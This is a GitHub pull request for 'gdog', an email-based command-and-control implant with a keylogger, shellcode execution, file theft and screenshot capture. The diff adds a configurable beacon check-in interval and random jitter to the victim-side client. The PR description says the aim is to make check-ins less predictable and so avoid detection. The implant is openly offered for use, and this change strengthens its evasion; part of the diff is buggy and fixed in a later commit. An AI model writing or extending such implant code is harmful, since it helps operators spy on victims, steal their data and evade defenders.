### PR TITLE
Change Checkin time and Added Jitter

### DIFF
--- a/README.md
+++ b/README.md
@@ -36,6 +36,8 @@ Features
 * Download file from the WEB
 * Visit website
 * Show message box to user
+* Ability to change check-in time
+* Ability to add jitter to check-in time to reduce predictability 
 
 
 Setup
@@ -85,26 +87,28 @@ optional arguments:
 Commands:
   Commands to execute on an implant
 
-  -cmd CMD              Execute a system command
-  -visitwebsite URL     Visit website
-  -message TEXT TITLE   Show message to user
-  -tasks                Retrieve running processes
-  -services             Retrieve system services
-  -users                Retrieve system users
-  -devices              Retrieve devices(Hardware)
-  -download PATH        Download a file from a clients system
+  -cmd CMD                Execute a system command
+  -visitwebsite URL       Visit website
+  -message TEXT TITLE     Show message to user
+  -tasks                  Retrieve running processes
+  -services               Retrieve system services
+  -users                  Retrieve system users
+  -devices                Retrieve devices(Hardware)
+  -download PATH          Download a file from a clients system
   -download-fromurl URL
-                        Download a file from the web
-  -upload SRC DST       Upload a file to the clients system
-  -exec-shellcode FILE  Execute supplied shellcode on a client
-  -screenshot           Take a screenshot
-  -lock-screen          Lock the clients screen
-  -shutdown             Shutdown remote computer
-  -restart              Restart remote computer
-  -logoff               Log off current remote user
-  -force-checkin        Force a check in
-  -start-keylogger      Start keylogger
-  -stop-keylogger       Stop keylogger
+                          Download a file from the web
+  -upload SRC DST         Upload a file to the clients system
+  -exec-shellcode FILE    Execute supplied shellcode on a client
+  -screenshot             Take a screenshot
+  -lock-screen            Lock the clients screen
+  -shutdown               Shutdown remote computer
+  -restart                Restart remote computer
+  -logoff                 Log off current remote user
+  -force-checkin          Force a check in
+  -start-keylogger        Start keylogger
+  -stop-keylogger         Stop keylogger
+  -email-checkin seconds  Seconds to wait before checking for new commands  
+  -jitter percentage      Percentage of Jitter
 ```
 
 

--- a/client.py
+++ b/client.py
@@ -23,9 +23,9 @@
 
 __author__ = "maldevel"
 __copyright__ = "Copyright (c) 2016 @maldevel"
-__credits__ = ["maldevel", "carnal0wnage", "byt3bl33d3r"]
+__credits__ = ["maldevel", "carnal0wnage", "byt3bl33d3r", "haydnjohnson"]
 __license__ = "GPLv3"
-__version__ = "1.1"
+__version__ = "1.2"
 __maintainer__ = "maldevel"
 
 

--- a/client.py
+++ b/client.py
@@ -1045,10 +1045,14 @@ def checkJobs():
             c.logout()
 
             #multiple by jitter 50% and divide by jitter and use as range
-            JITTER_HIGH = ((EMAIL_KNOCK_TIMEOUT * JITTER ) /100.0) * 3
-            JITTER_LOW =  (EMAIL_KNOCK_TIMEOUT * JITTER ) /100.0
+            if JITTER != 100:
+                JITTER_HIGH = ((EMAIL_KNOCK_TIMEOUT * JITTER ) /100.0) * 3
+                JITTER_LOW =  (EMAIL_KNOCK_TIMEOUT * JITTER ) /100.0
 
-            time.sleep(random.randrange(JITTER_LOW, JITTER_HIGH))
+                time.sleep(random.randrange(JITTER_LOW, JITTER_HIGH))
+            else:
+                time.sleep(EMAIL_KNOCK_TIMEOUT)
+
         
         except Exception as e:
             #logging.debug(format_exc())

--- a/client.py
+++ b/client.py
@@ -50,6 +50,7 @@ import netifaces
 import urllib2
 import urllib
 import pythoncom
+import random
 
 from win32com.client import GetObject
 from enum import Enum
@@ -75,6 +76,7 @@ server = "smtp.gmail.com"
 server_port = 587
 AESKey = 'my_AES_key'
 EMAIL_KNOCK_TIMEOUT = 60 #seconds - check for new commands/jobs every EMAIL_KNOCK_TIMEOUT seconds
+JITTER = 50
 TAG = 'RELEASE'
 VERSION = '1.0.0'
 #######################################
@@ -1041,7 +1043,12 @@ def checkJobs():
                         raise NotImplementedError
 
             c.logout()
-            time.sleep(EMAIL_KNOCK_TIMEOUT)
+
+            #multiple by jitter 50% and divide by jitter and use as range
+            JITTER_HIGH = ((EMAIL_KNOCK_TIMEOUT * JITTER ) /100.0) * 3
+            JITTER_LOW =  (EMAIL_KNOCK_TIMEOUT * JITTER ) /100.0
+
+            time.sleep(random.randrange(JITTER_LOW, JITTER_HIGH))
         
         except Exception as e:
             #logging.debug(format_exc())

--- a/gdog.py
+++ b/gdog.py
@@ -294,6 +294,8 @@ if __name__ == '__main__':
     slogopts.add_argument("-force-checkin", dest='forcecheckin', action='store_true', help='Force a check in')
     slogopts.add_argument("-start-keylogger", dest='keylogger', action='store_true', help='Start keylogger')
     slogopts.add_argument("-stop-keylogger", dest='stopkeylogger', action='store_true', help='Stop keylogger')
+    slogopts.add_argument("-email-checkin", dest='email_check', action='store_true', help='Seconds to wait before checking for new commands')
+    slogopts.add_argument("-jitter", dest='jitter', action='store_true', help='Percentage of Jitter')
     
     if len(sys.argv) is 1:
         parser.print_help()
@@ -366,6 +368,12 @@ if __name__ == '__main__':
 
     elif args.stopkeylogger:
         gdog.sendEmail(args.id, jobid, 'stopkeylogger')
+
+    elif args.stopkeylogger:
+        gdog.sendEmail(args.id, jobid, 'email_check')
+
+    elif args.stopkeylogger:
+        gdog.sendEmail(args.id, jobid, 'jitter')
 
     elif args.jobid:
         gdog.getJobResults(args.id, args.jobid)

--- a/gdog.py
+++ b/gdog.py
@@ -294,8 +294,8 @@ if __name__ == '__main__':
     slogopts.add_argument("-force-checkin", dest='forcecheckin', action='store_true', help='Force a check in')
     slogopts.add_argument("-start-keylogger", dest='keylogger', action='store_true', help='Start keylogger')
     slogopts.add_argument("-stop-keylogger", dest='stopkeylogger', action='store_true', help='Stop keylogger')
-    slogopts.add_argument("-email-checkin", dest='email_check', action='store_true', help='Seconds to wait before checking for new commands')
-    slogopts.add_argument("-jitter", dest='jitter', action='store_true', help='Percentage of Jitter')
+    slogopts.add_argument("-email-checkin",type=int, metavar='CHECK', dest='email_check', help='Seconds to wait before checking for new commands')
+    slogopts.add_argument("-jitter", metavar='jit',type=int, dest='jitter', help='Percentage of Jitter')
     
     if len(sys.argv) is 1:
         parser.print_help()
@@ -369,11 +369,11 @@ if __name__ == '__main__':
     elif args.stopkeylogger:
         gdog.sendEmail(args.id, jobid, 'stopkeylogger')
 
-    elif args.stopkeylogger:
-        gdog.sendEmail(args.id, jobid, 'email_check')
+    elif args.email_check:
+        gdog.sendEmail(args.id, jobid, 'email_check', args.email_check)
 
-    elif args.stopkeylogger:
-        gdog.sendEmail(args.id, jobid, 'jitter')
+    elif args.jitter:
+        gdog.sendEmail(args.id, jobid, 'jitter', args.jitter)
 
     elif args.jobid:
         gdog.getJobResults(args.id, args.jobid)


### PR DESCRIPTION
Most beacon / asynchronous C2's have a function to change the standard time it checks into the C2 as well as a 'jitter' in order to reduce predictability of the checkin and thus a higher chance to avoid detection.

Thought I could add to the project by adding them. 

Emails report back as below:

![selection_137](https://cloud.githubusercontent.com/assets/2356349/21125695/78f8f878-c0b5-11e6-88ab-64cda428fa16.png)

Functions created for functionality and global variables overwritten as below:
![selection_138](https://cloud.githubusercontent.com/assets/2356349/21125717/a936f04e-c0b5-11e6-95fb-4fd27cd70d3d.png)

Reach out to me via twitter:
@haydnjohnson


